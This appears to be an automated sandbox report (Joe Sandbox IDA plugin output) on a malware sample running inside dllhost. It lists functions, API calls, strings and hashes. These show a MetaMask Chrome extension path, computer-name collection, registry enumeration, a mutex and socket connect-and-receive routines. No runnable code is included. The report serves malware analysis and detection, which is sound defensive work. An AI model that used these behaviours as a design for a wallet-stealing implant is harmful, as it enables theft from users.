_strncpy.LIBCMT ref: 032A40CC
LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,?,?,762323A0,?), ref: 032A40E4
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 032A4102
GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 032A410C
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,762323A0), ref: 032A4125
_strncpy.LIBCMT ref: 032A4196
_strncpy.LIBCMT ref: 032A41AD
GetTickCount.KERNEL32 ref: 032A41B5
wsprintfA.USER32 ref: 032A4208
_strncpy.LIBCMT ref: 032A4221
_strncpy.LIBCMT ref: 032A4268
_memset.LIBCMT ref: 032A4285
wsprintfA.USER32 ref: 032A429F
_strncpy.LIBCMT ref: 032A42D0

Part of subcall function 03291AA0: std::_Xinvalid_argument.LIBCPMT ref: 03291AB6

GetFileAttributesA.KERNELBASE(00000000), ref: 032A42E1
lstrcpyA.KERNEL32(?,032ABDD0), ref: 032A42FC

Strings

GetCurrentProcess, xrefs: 032A4104
C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\, xrefs: 032A4299
Time, xrefs: 032A420F
IsWow64Process, xrefs: 032A40F2
kernel32.dll, xrefs: 032A40DF
Remark, xrefs: 032A4093

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _strncpy$_memset$wsprintf$AddressLibraryProclstrcpy$AttributesComputerCountFileFreeLoadNameTickXinvalid_argumentgethostnameinet_addrstd::_
String ID: C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\$GetCurrentProcess$IsWow64Process$Remark$Time$kernel32.dll
API String ID: 2267238800-354951080
Opcode ID: 6053a23a76e8f585c0aa3ac38dd4c424b89d4b0fbbcb56cd9804d55ff0d8f81f
Instruction ID: 29682acf9112c4357c8a5490adf6923251fac26c098f7ad7f3320a6f51d407eb
Opcode Fuzzy Hash: 6053a23a76e8f585c0aa3ac38dd4c424b89d4b0fbbcb56cd9804d55ff0d8f81f
Instruction Fuzzy Hash: AA811975D10718ABDB24FB6CAC45BEEB778AB44700F0441A9E609A7241DBB09EC4CF95

Function 032A4A70 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 197
libraryloaderregistryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 032A4AD6
_memset.LIBCMT ref: 032A4AE9
_memset.LIBCMT ref: 032A4AFC
LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4B09
GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 032A4B23
GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 032A4B31
GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 032A4B3F
GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 032A4B47
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 032A4B4F
RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4B7C
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4D13

Strings

%08X, xrefs: 032A4CE3
RegEnumValueA, xrefs: 032A4B39
Enable, xrefs: 032A4A9A
RegCloseKey, xrefs: 032A4B49
RegQueryValueExA, xrefs: 032A4B17
ADVAPI32.dll, xrefs: 032A4B04
RegEnumKeyExA, xrefs: 032A4B41
RegOpenKeyExA, xrefs: 032A4B2B

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AddressProc$_memset$Library$FreeLoadOpen
String ID: %08X$ADVAPI32.dll$Enable$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
API String ID: 1822379937-990719231
Opcode ID: 8ae418be32c6289f97d50a6ca4eb410973d54a1c623b3ba56ccb94f5ec9b31d4
Instruction ID: 1b95088754161a863a25fc3c4b12ff866d1fd5599bda0a527514751139d1731b
Opcode Fuzzy Hash: 8ae418be32c6289f97d50a6ca4eb410973d54a1c623b3ba56ccb94f5ec9b31d4
Instruction Fuzzy Hash: F5713171A10719AFDB20EF59DC89FEEB7BCBB48700F0045D9E519A6241DBB09A84CF51

Function 032A46E0 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 152
stringsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E5F
Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E79
Part of subcall function 032A4E40: GetComputerNameA.KERNEL32(00000000,?), ref: 032A4E99
Part of subcall function 032A4E40: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4EAF
Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4EC3
Part of subcall function 032A4E40: wsprintfA.USER32 ref: 032A4EDB

OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 032A4716
ExitProcess.KERNEL32 ref: 032A471E
lstrlenA.KERNEL32(00000000,?,?), ref: 032A472F
__time64.LIBCMT ref: 032A4740
__localtime64.LIBCMT ref: 032A474C
_memset.LIBCMT ref: 032A4768
wsprintfA.USER32 ref: 032A4794
CreateMutexA.KERNELBASE(00000000,00000000,MaticYoyox,?,?), ref: 032A47B6
GetLastError.KERNEL32(?,?), ref: 032A47BE
CloseHandle.KERNEL32(00000000,?,?), ref: 032A47CC

Strings

Enable, xrefs: 032A46F5
Blocked, xrefs: 032A4711
%d-%d-%d %d:%d, xrefs: 032A478E
Time, xrefs: 032A4724, 032A47A3
MaticYoyox, xrefs: 032A47AD
CopyC, xrefs: 032A4822
False, xrefs: 032A46FF

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _memset$wsprintf$CloseComputerCreateDebugErrorExitHandleLastMutexNameOutputProcessString__localtime64__time64lstrcpylstrlen
String ID: %d-%d-%d %d:%d$Blocked$CopyC$Enable$False$MaticYoyox$Time
API String ID: 2009633151-763860070
Opcode ID: 519eda2794e8506d8020a46493d2b20c79a2b721a1422e24ed2ed7fe03dfeecd
Instruction ID: b09692eca7ed7ee9d6e9bfd3dac0b808047a7d290159a79d4f6b483bf9f5254c
Opcode Fuzzy Hash: 519eda2794e8506d8020a46493d2b20c79a2b721a1422e24ed2ed7fe03dfeecd
Instruction Fuzzy Hash: 93514C75920B149FDB20F769FC48B9A73B8AF44310F148599E919D7241DBB099C4CBA1

Function 032A4360 Relevance: 36.2, APIs: 24, Instructions: 212
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 032A7150: WSAStartup.WS2_32(00000202,?), ref: 032A71A1
Part of subcall function 032A7150: InitializeCriticalSection.KERNEL32(?), ref: 032A71AE
Part of subcall function 032A7150: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 032A71B9
Part of subcall function 032A7150: __time64.LIBCMT ref: 032A71DC

GetTickCount.KERNEL32 ref: 032A43C6

Part of subcall function 032A7880: ResetEvent.KERNEL32(?,762323A0,?,?), ref: 032A78A3
Part of subcall function 032A7880: socket.WS2_32 ref: 032A78B6

Sleep.KERNEL32(0000EA60,00000000), ref: 032A4405
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 032A443E
_memset.LIBCMT ref: 032A4469
_strncpy.LIBCMT ref: 032A447F
GetTickCount.KERNEL32 ref: 032A44A4
GetTickCount.KERNEL32 ref: 032A44B5
setsockopt.WS2_32 ref: 032A44F1
CancelIo.KERNEL32(?), ref: 032A44FF
InterlockedExchange.KERNEL32(?,00000000), ref: 032A450F
closesocket.WS2_32(?), ref: 032A451D
SetEvent.KERNEL32(?), ref: 032A452B
Sleep.KERNEL32 ref: 032A4547
Sleep.KERNEL32(00000BB8), ref: 032A4561
CloseHandle.KERNEL32(?), ref: 032A457A
GetTickCount.KERNEL32 ref: 032A469C

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: CountEventTick$Sleep$Create$CancelCloseCriticalExchangeHandleInitializeInterlockedResetSectionStartup__time64_memset_strncpyclosesocketsetsockoptsocket
String ID:
API String ID: 2471061221-0
Opcode ID: 68d3dfda636c039d07add5f5f3be4f81af08b34fc83b9565b7a8084d74fb60ed
Instruction ID: 933b86bfe0da2f089dcea04d7279bdd68f6cf6912383d0d6b7e3473067bc2216
Opcode Fuzzy Hash: 68d3dfda636c039d07add5f5f3be4f81af08b34fc83b9565b7a8084d74fb60ed
Instruction Fuzzy Hash: 1481DF715187819FD734EF69E884BDFB7E4AF88704F04891DE68997280DBB09584CB92

Function 032A7880 Relevance: 21.1, APIs: 14, Instructions: 136
networkthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 032A6EF0: setsockopt.WS2_32(000000FF,0000FFFF,00000080,?,00000004), ref: 032A6F12
Part of subcall function 032A6EF0: CancelIo.KERNEL32(000000FF,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F1F
Part of subcall function 032A6EF0: InterlockedExchange.KERNEL32(00000000,00000000), ref: 032A6F2E
Part of subcall function 032A6EF0: closesocket.WS2_32(000000FF), ref: 032A6F3B
Part of subcall function 032A6EF0: SetEvent.KERNEL32(?,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F48

ResetEvent.KERNEL32(?,762323A0,?,?), ref: 032A78A3
socket.WS2_32 ref: 032A78B6
gethostbyname.WS2_32(?), ref: 032A78DD
htons.WS2_32(?), ref: 032A78F6
inet_ntoa.WS2_32(?), ref: 032A7911
_wprintf.LIBCMT ref: 032A7919
connect.WS2_32(?,?,00000010), ref: 032A792E
getsockname.WS2_32(?,?,?), ref: 032A795D
_memset.LIBCMT ref: 032A796E
inet_ntoa.WS2_32(?), ref: 032A797A
wsprintfA.USER32 ref: 032A797E
setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 032A79A3
WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 032A79D8
CreateThread.KERNELBASE ref: 032A79F3

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Eventinet_ntoasetsockopt$CancelCreateExchangeInterlockedIoctlResetThread_memset_wprintfclosesocketconnectgethostbynamegetsocknamehtonssocketwsprintf
String ID:
API String ID: 628104682-0
Opcode ID: be2426fb80b4d15de9aeb2170eba5bc65fd056b875e77fa09df8e29e9e37fc38
Instruction ID: 8bf2f59192f3d0e2ed07dd78db97473b756c7c34f0d12ff7911eaa65977066a5
Opcode Fuzzy Hash: be2426fb80b4d15de9aeb2170eba5bc65fd056b875e77fa09df8e29e9e37fc38
Instruction Fuzzy Hash: E0415F71940708AFD750EBA8E889FEEB7B9EF48710F108519F519E7280DB706984CB61

Function 032A76D0 Relevance: 18.1, APIs: 12, Instructions: 110
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

select.WS2_32(00000000,?,00000000), ref: 032A7738
_memset.LIBCMT ref: 032A7755
recv.WS2_32(?,?,00002000,00000000), ref: 032A7772
setsockopt.WS2_32 ref: 032A77C2
CancelIo.KERNEL32(?), ref: 032A77CF
InterlockedExchange.KERNEL32(00000000,00000000), ref: 032A77DE
closesocket.WS2_32(?), ref: 032A77EB
setsockopt.WS2_32 ref: 032A781E
CancelIo.KERNEL32(?), ref: 032A782B
InterlockedExchange.KERNEL32(?,00000000), ref: 032A783A
closesocket.WS2_32(?), ref: 032A7847

Part of subcall function 032A7460: wsprintfA.USER32 ref: 032A7564

SetEvent.KERNEL32(?), ref: 032A7854

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: CancelExchangeInterlockedclosesocketsetsockopt$Event_memsetrecvselectwsprintf
String ID:
API String ID: 1886666018-0
Opcode ID: 2f13f6f90e894cd09e33f7b912994ee65d0fa90b7d5b70ad27b4db27cf2a7543
Instruction ID: 67b9a0b129d8d766e87c4b1e89464de8598ee8723dfb781b2ba295f7140e15d6
Opcode Fuzzy Hash: 2f13f6f90e894cd09e33f7b912994ee65d0fa90b7d5b70ad27b4db27cf2a7543
Instruction Fuzzy Hash: 07419271650308ABEB50DFA8DC88FE57779BB08700F0485A4EA099E2C5DB7095C8CF61

Function 032A4E40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 55
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 032A4E5F
_memset.LIBCMT ref: 032A4E79
GetComputerNameA.KERNEL32(00000000,?), ref: 032A4E99
lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4EAF
_memset.LIBCMT ref: 032A4EC3
wsprintfA.USER32 ref: 032A4EDB

Strings

Enable, xrefs: 032A4EE8
UnKnow, xrefs: 032A4EA3
SOFTWARE\%s\, xrefs: 032A4ED5

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _memset$ComputerNamelstrcpywsprintf
String ID: Enable$SOFTWARE\%s\$UnKnow
API String ID: 1685617284-1753358750
Opcode ID: 0c117518f452838524e02c6dc9162469c323cf422bcdc192c9fffb75947b36c3
Instruction ID: 32ecf723b6c1e3299bcb77017b16e77515f009d312011f0ec83256851ebe3e04
Opcode Fuzzy Hash: 0c117518f452838524e02c6dc9162469c323cf422bcdc192c9fffb75947b36c3
Instruction Fuzzy Hash: E011E7B5AA030CABEB20EB58DC4AFDE73789B44700F0084D5E304AA181EBB16BD4CB54

Function 032A3620 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 45
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000,Time), ref: 032A3641
_memset.LIBCMT ref: 032A3653
_strtok.LIBCMT ref: 032A3664

Part of subcall function 032930B7: __getptd.LIBCMT ref: 032930D5

_strtok.LIBCMT ref: 032A367F
lstrcpyA.KERNEL32(user,00000000), ref: 032A3691

Strings

Time, xrefs: 032A3633
engineer, xrefs: 032A364E, 032A368C, 032A369C

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _strtok$FolderPathSpecial__getptd_memsetlstrcpy
String ID: Time$user
API String ID: 3045899276-4045029352
Opcode ID: 5aee336cf134853df3608cde9dfc392507d49bf379a154c5a91c51bb4c5aefc7
Instruction ID: 593c50f1fc69773f6164d97d79a9ebda20818fed05346eef6851a1101b334f6a
Opcode Fuzzy Hash: 5aee336cf134853df3608cde9dfc392507d49bf379a154c5a91c51bb4c5aefc7
Instruction Fuzzy Hash: D601F938AA0709BBEA60F6686C0AFEE77789F14F40F414055EB45AA1C0EB915AC4C696

Function 032A3340 Relevance: 10.6, APIs: 7, Instructions: 70
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,032AF5F0,00000000,?,?,032A3E3E), ref: 032A3351

Part of subcall function 032928EE: _malloc.LIBCMT ref: 03292908

Process32First.KERNEL32(00000000,00000000), ref: 032A337A
lstrcmpiA.KERNEL32(00000024,?), ref: 032A338D
CloseHandle.KERNELBASE(00000000), ref: 032A33D5

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32_malloclstrcmpi
String ID:
API String ID: 2970433402-0
Opcode ID: bf9f1f76c4909c68164d5534785903a28533fa44091a77c9248fbe2aa36ee874
Instruction ID: 578281f63779cbdd1dcb4cf33fe4f1bc66b6f9d8053031efb0af83991d1cd4b3
Opcode Fuzzy Hash: bf9f1f76c4909c68164d5534785903a28533fa44091a77c9248fbe2aa36ee874
Instruction Fuzzy Hash: 94119A35615709E7D710EF5AEC48BAF776CEF417A1F088459FA05C6100EB749980D7E1

Function 032A7260 Relevance: 7.7, APIs: 5, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(76232460,76938400,032AB814), ref: 032A7294
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 032A72AD
_rand.LIBCMT ref: 032A72BC
wsprintfA.USER32 ref: 032A7331
LeaveCriticalSection.KERNEL32(?,?,?), ref: 032A7436

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveVirtual_randwsprintf
String ID:
API String ID: 54394521-0
Opcode ID: 9a9380250c9acd2b7fc742f01001b5642661251bcfc5d339d5b9670283957ec7
Instruction ID: f589524fdf8bdb1d54b62426fecc77a09d54d00c7aaace87e91e02ede0cd0c12
Opcode Fuzzy Hash: 9a9380250c9acd2b7fc742f01001b5642661251bcfc5d339d5b9670283957ec7
Instruction Fuzzy Hash: 8E51A471A10A16AFDB15DF6DC8849AAF7A8BF44314F048669E819DB200DB30F995CB94

Function 032A3E00 Relevance: 6.1, APIs: 4, Instructions: 69
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 032A3E13
lstrcatA.KERNEL32(032B0E18,032ABCD4,?,?,00000000,00000000,?,032A4174,00000000,?,?,?,?,?,?,762323A0), ref: 032A3EAB

Part of subcall function 032A3340: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,032AF5F0,00000000,?,?,032A3E3E), ref: 032A3351

lstrcatA.KERNEL32(032B0E18,032ABBF4,?,00000000,00000000,?,032A4174,00000000,?,?,?,?,?,?,762323A0), ref: 032A3E57
lstrcatA.KERNEL32(032B0E18,032AB7A4,?,00000000,00000000,?,032A4174,00000000,?,?,?,?,?,?,762323A0), ref: 032A3E63

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: lstrcat$CreateSnapshotToolhelp32_memset
String ID:
API String ID: 2821338896-0
Opcode ID: 5580510bc7785798f016e4c78e0f54cdb0abf3d265d06c857654088a41d41ba7
Instruction ID: 8c75da78d3dc8071ea608bcb1723e3273a1d34689d7b4cb746cce15fa8b7f0a1
Opcode Fuzzy Hash: 5580510bc7785798f016e4c78e0f54cdb0abf3d265d06c857654088a41d41ba7
Instruction Fuzzy Hash: D211062AA20B1A6FDE54DAAC9E41A5B77A8DF44784B098865E91497201F7B0ACD0C3E0

Function 032A7150 Relevance: 6.1, APIs: 4, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 032A71A1
InitializeCriticalSection.KERNEL32(?), ref: 032A71AE
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 032A71B9
__time64.LIBCMT ref: 032A71DC

Part of subcall function 0329269A: GetSystemTimeAsFileTime.KERNEL32(032A4745,?,?,?,032A4745,?,?,?), ref: 032926A5
Part of subcall function 0329269A: __aulldiv.LIBCMT ref: 032926C5

Part of subcall function 03292667: __getptd.LIBCMT ref: 0329266C

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Time$CreateCriticalEventFileInitializeSectionStartupSystem__aulldiv__getptd__time64
String ID:
API String ID: 2538592855-0
Opcode ID: ac1021962c8507dd278bfc7ddbbb0081ac2468f16dde8277494034bc7bbe5b7b
Instruction ID: df981e08ab222f54e105b31f29dce2aa638b98982d04c5384247a7c5b76a88d6
Opcode Fuzzy Hash: ac1021962c8507dd278bfc7ddbbb0081ac2468f16dde8277494034bc7bbe5b7b
Instruction Fuzzy Hash: 1C11B6B0911B08DFD760DF6A9888A56FBE8BB08700F508A2EA59E87A41D730A544CB54

Function 032A7BA0 Relevance: 4.6, APIs: 3, Instructions: 79
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__floor_pentium4.LIBCMT ref: 032A7BD6
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 032A7C0D

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AllocVirtual__floor_pentium4
String ID:
API String ID: 4174053956-0
Opcode ID: 083c71f0ab56f7a97007e19abc9c323c89d85be2cebfa8b98b9df6d7b7d384f7
Instruction ID: f68b5cdbecba516c38e40e2e2b0171661e9c18363f200fcb619c4872d0d92b4e
Opcode Fuzzy Hash: 083c71f0ab56f7a97007e19abc9c323c89d85be2cebfa8b98b9df6d7b7d384f7
Instruction Fuzzy Hash: BD212231718B049BD750DF6EE98462BF7E8FF80B21F044D2DF999C2280E631D8448746

Function 032A43D8 Relevance: 3.0, APIs: 2, Instructions: 33
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 032A7880: ResetEvent.KERNEL32(?,762323A0,?,?), ref: 032A78A3
Part of subcall function 032A7880: socket.WS2_32 ref: 032A78B6

Sleep.KERNEL32(0000EA60,00000000), ref: 032A4405
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 032A443E
_memset.LIBCMT ref: 032A4469
_strncpy.LIBCMT ref: 032A447F
GetTickCount.KERNEL32 ref: 032A44A4
GetTickCount.KERNEL32 ref: 032A44B5
setsockopt.WS2_32 ref: 032A44F1
CancelIo.KERNEL32(?), ref: 032A44FF
InterlockedExchange.KERNEL32(?,00000000), ref: 032A450F
closesocket.WS2_32(?), ref: 032A451D
SetEvent.KERNEL32(?), ref: 032A452B
Sleep.KERNEL32 ref: 032A4547
Sleep.KERNEL32(00000BB8), ref: 032A4561
CloseHandle.KERNEL32(?), ref: 032A457A
GetTickCount.KERNEL32 ref: 032A469C

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: CountEventSleepTick$CancelCloseCreateExchangeHandleInterlockedReset_memset_strncpyclosesocketsetsockoptsocket
String ID:
API String ID: 1535685871-0
Opcode ID: 9cf69780d4dec1c18eeccddf2c9c45e4b01cb4384cf84d7fdc279a8995051ff7
Instruction ID: 22b479a5b6d4822b01c0a835c40fbc61a3de855b647dd4d80ace51556eefafa8
Opcode Fuzzy Hash: 9cf69780d4dec1c18eeccddf2c9c45e4b01cb4384cf84d7fdc279a8995051ff7
Instruction Fuzzy Hash: 62F02B75628740CFDB28EF59F44039AB3E4FF84340F40445DD90987240DBB19484CB42

Function 032B714D Relevance: 1.5, APIs: 1, Instructions: 47
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(0000C087,?,?,?,00000000,032B70C7,?,?,?,?,?), ref: 032B7160

Memory Dump Source

Source File: 00000008.00000002.4691434361.00000000032B7000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_32b7000_dllhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
Instruction ID: 02a30c77859aa576e29d061f8d571bef75d6347e0ff9a39ccb5e77dafaa3ffa7
Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
Instruction Fuzzy Hash: E3F0D6B26393134BEB10CD5CCC405B7B3BCAEC1AE57090428E952D7201E261D8818770

Function 032A7D50 Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?,?,?,03293B61,?,?,?,?,?,?,032AC4D8,0000000C,03293C09,?), ref: 032A7D5E

Part of subcall function 032A46E0: OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 032A4716
Part of subcall function 032A46E0: ExitProcess.KERNEL32 ref: 032A471E

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: CallsDebugDisableExitLibraryOutputProcessStringThread
String ID:
API String ID: 825726465-0
Opcode ID: 9bb6433fb13a4fd32144e4b9bb295bc148f664e226595a6c26f6c3e66b411eb2
Instruction ID: 6b7b83632492194bdd0b34bfc1b9f3d26a0aec7fbe60250994534e3fb7a36f8a
Opcode Fuzzy Hash: 9bb6433fb13a4fd32144e4b9bb295bc148f664e226595a6c26f6c3e66b411eb2
Instruction Fuzzy Hash: 36D0C936025E2897CB01BF5DB445ADE77EC9B18790F008042F9049B340D7B4F9C19BD9

Function 03297645 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,000000FF,?,0329A29F,00000011,00000000,?,03294583,0000000D,032AC540,00000008,0329467A,00000000), ref: 0329764E

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 1212a5378d99a791f33ed506674f684420bfbffab377ae6af48662059c61bcfe
Instruction ID: 72b1e8e9b565bea4246a8c8e812b5457f9b42b53b210e3c848d568d4c9a129ae
Opcode Fuzzy Hash: 1212a5378d99a791f33ed506674f684420bfbffab377ae6af48662059c61bcfe
Instruction Fuzzy Hash: 7EC09B71741B0557E75557357C5E74525945B49B42F2040297207D95C4D79054909604

Non-executed Functions

Function 032A67F0 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 298clipboardsleepmemoryCOMMON

